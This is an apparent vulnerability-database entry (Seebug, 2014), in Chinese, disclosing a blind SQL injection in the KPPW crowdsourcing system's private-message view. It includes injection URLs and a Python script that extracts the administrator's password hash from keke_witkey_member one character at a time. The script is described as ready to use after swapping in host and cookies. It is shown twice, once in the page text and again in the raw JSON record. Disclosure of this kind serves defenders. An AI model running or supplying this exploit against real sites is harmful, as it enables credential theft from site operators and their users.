Search...

KPPW开源威客系统绕过防护盲注

2014-09-21T00:00:00

ID SSV:94520
Type seebug
Reporter Root
Modified 2014-09-21T00:00:00

Description

简要描述：

KPPW开源威客系统绕过防护盲注

详细说明：

1. WooYun: kppw一处sql注入厂商对这个漏洞进行了修复。替换了union 不能进行联合了但是可以进行盲注。同一个类型，多点。不过问题都出在消息这。 2. 注册两个帐号，然后其中一个对另外那个发送3个消息。

3. 打开中间那条 url如下 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 然后尝试注入

下面我们可以看到上一条和下一条。注入测试 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=1--

存在。 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=2--

消失了。 3. 主要利用url http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and (select CHAR(48))=SUBSTR((SELECT password from keke_witkey_member WHERE uid =1),1,1)-- 下面写了一个小工具替换下host url cookies就可以用了。

```

coding:utf-8

import httplib def get(i1,i2): page="" rHtml=httplib.HTTPConnection("192.168.1.101",80,False) url="/KPPW/index.php?do=user&view=message&op=detail&type=notice&intPage=1&msgId=13%20and%20%28select%20CHAR%28"+i1+"%29%29=SUBSTR%28%28SELECT%20%60password%60%20from%20keke_witkey_member%20WHERE%20uid%20=1%29,"+i2+",1%29--" #print url rHtml.request("GET",url,headers={"User-Agent":"Firefox/22.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Cookie":"PHPSESSID=x","Connection":"keep-alive"}) page=rHtml.getresponse(False) return page.read().count('一条') mm=[] for i in range(1,33): for ii in range(48,123): if(get(str(ii),str(i))!=0): mm.append(chr(ii)) print "".join(mm) break ```

漏洞证明：

```

coding:utf-8

JSON Vulners Source

Initial Source

{"type": "seebug", "viewCount": 1, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T13:13:01", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T13:13:01", "rev": 2}, "vulnersScore": 0.0}, "reporter": "Root", "title": "KPPW\u5f00\u6e90\u5a01\u5ba2\u7cfb\u7edf\u7ed5\u8fc7\u9632\u62a4\u76f2\u6ce8", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-09-21T00:00:00", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\nKPPW\u5f00\u6e90\u5a01\u5ba2\u7cfb\u7edf \u7ed5\u8fc7\u9632\u62a4\u76f2\u6ce8\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n1.\n [WooYun: kppw\u4e00\u5904sql\u6ce8\u5165](http://www.wooyun.org/bugs/wooyun-2014-066270) \n\u5382\u5546\u5bf9\u8fd9\u4e2a\u6f0f\u6d1e\u8fdb\u884c\u4e86\u4fee\u590d\u3002\u66ff\u6362\u4e86union \u4e0d\u80fd\u8fdb\u884c\u8054\u5408\u4e86\n\u4f46\u662f\u53ef\u4ee5\u8fdb\u884c\u76f2\u6ce8\u3002\n\u540c\u4e00\u4e2a\u7c7b\u578b\uff0c\u591a\u70b9\u3002\u4e0d\u8fc7\u95ee\u9898\u90fd\u51fa\u5728\u6d88\u606f\u8fd9\u3002\n2.\n\u6ce8\u518c\u4e24\u4e2a\u5e10\u53f7\uff0c\u7136\u540e\u5176\u4e2d\u4e00\u4e2a\u5bf9\u53e6\u5916\u90a3\u4e2a\u53d1\u90013\u4e2a\u6d88\u606f\u3002\n\n\n[<img src=\"https://images.seebug.org/upload/201409/202350221c8d983e19466841993b7d6f5369f6af.png\" alt=\"\u56fe\u72471.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201409/202350221c8d983e19466841993b7d6f5369f6af.png)\n\n\n3.\n\u6253\u5f00\u4e2d\u95f4\u90a3\u6761 url\u5982\u4e0b\nhttp://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16\n\u7136\u540e\u5c1d\u8bd5\u6ce8\u5165\n\n\n[<img src=\"https://images.seebug.org/upload/201409/2023515522696e6c3b49f424041744d68d55c33b.png\" alt=\"\u56fe\u72472.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201409/2023515522696e6c3b49f424041744d68d55c33b.png)\n\n\n\u4e0b\u9762\u6211\u4eec\u53ef\u4ee5\u770b\u5230 \u4e0a\u4e00\u6761 \u548c \u4e0b\u4e00\u6761 \u3002\n\u6ce8\u5165\u6d4b\u8bd5\nhttp://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=1--\n\n\n[<img src=\"https://images.seebug.org/upload/201409/20235228b7b2a7bedc5c074508fbbeeae63d45f6.png\" alt=\"\u56fe\u72473.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201409/20235228b7b2a7bedc5c074508fbbeeae63d45f6.png)\n\n\n\u5b58\u5728\u3002\nhttp://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=2--\n\n\n[<img src=\"https://images.seebug.org/upload/201409/20235256713d0e6d6b6fe504875a82762dbf20ed.png\" alt=\"\u56fe\u72474.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201409/20235256713d0e6d6b6fe504875a82762dbf20ed.png)\n\n\n\u6d88\u5931\u4e86\u3002\n3.\n\u4e3b\u8981\u5229\u7528url\nhttp://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and (select CHAR(48))=SUBSTR((SELECT `password` from keke_witkey_member WHERE uid =1),1,1)--\n\u4e0b\u9762 \u5199\u4e86\u4e00\u4e2a\u5c0f\u5de5\u5177 \u66ff\u6362\u4e0bhost url cookies\u5c31\u53ef\u4ee5\u7528\u4e86\u3002\n\n\n```\n#coding:utf-8\nimport httplib\ndef get(i1,i2):\n\tpage=\"\"\n\trHtml=httplib.HTTPConnection(\"192.168.1.101\",80,False)\n\turl=\"/KPPW/index.php?do=user&view=message&op=detail&type=notice&intPage=1&msgId=13%20and%20%28select%20CHAR%28\"+i1+\"%29%29=SUBSTR%28%28SELECT%20%60password%60%20from%20keke_witkey_member%20WHERE%20uid%20=1%29,\"+i2+\",1%29--\"\n\t#print url\n\trHtml.request(\"GET\",url,headers={\"User-Agent\":\"Firefox/22.0\",\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\"Accept-Language\":\"en-US,en;q=0.5\",\"Accept-Encoding\":\"gzip, deflate\",\"Cookie\":\"PHPSESSID=x\",\"Connection\":\"keep-alive\"})\n\tpage=rHtml.getresponse(False)\n\treturn page.read().count('\u4e00\u6761')\nmm=[]\nfor i in range(1,33):\n\tfor ii in range(48,123):\n\t\tif(get(str(ii),str(i))!=0):\n\t\t\tmm.append(chr(ii))\n\t\t\tprint \"\".join(mm)\n\t\t\tbreak\n```\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png\" alt=\"\u56fe\u72475.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png)\n\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n```\n#coding:utf-8\nimport httplib\ndef get(i1,i2):\n\tpage=\"\"\n\trHtml=httplib.HTTPConnection(\"192.168.1.101\",80,False)\n\turl=\"/KPPW/index.php?do=user&view=message&op=detail&type=notice&intPage=1&msgId=13%20and%20%28select%20CHAR%28\"+i1+\"%29%29=SUBSTR%28%28SELECT%20%60password%60%20from%20keke_witkey_member%20WHERE%20uid%20=1%29,\"+i2+\",1%29--\"\n\t#print url\n\trHtml.request(\"GET\",url,headers={\"User-Agent\":\"Firefox/22.0\",\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\"Accept-Language\":\"en-US,en;q=0.5\",\"Accept-Encoding\":\"gzip, deflate\",\"Cookie\":\"PHPSESSID=x\",\"Connection\":\"keep-alive\"})\n\tpage=rHtml.getresponse(False)\n\treturn page.read().count('\u4e00\u6761')\nmm=[]\nfor i in range(1,33):\n\tfor ii in range(48,123):\n\t\tif(get(str(ii),str(i))!=0):\n\t\t\tmm.append(chr(ii))\n\t\t\tprint \"\".join(mm)\n\t\t\tbreak\n```\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png\" alt=\"\u56fe\u72475.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201409/202354420de9961ebb63f42efa3a0b4c5ca63360.png)", "href": "https://www.seebug.org/vuldb/ssvid-94520", "id": "SSV:94520", "status": "details", "lastseen": "2017-11-19T13:13:01", "sourceData": "", "published": "2014-09-21T00:00:00", "immutableFields": []}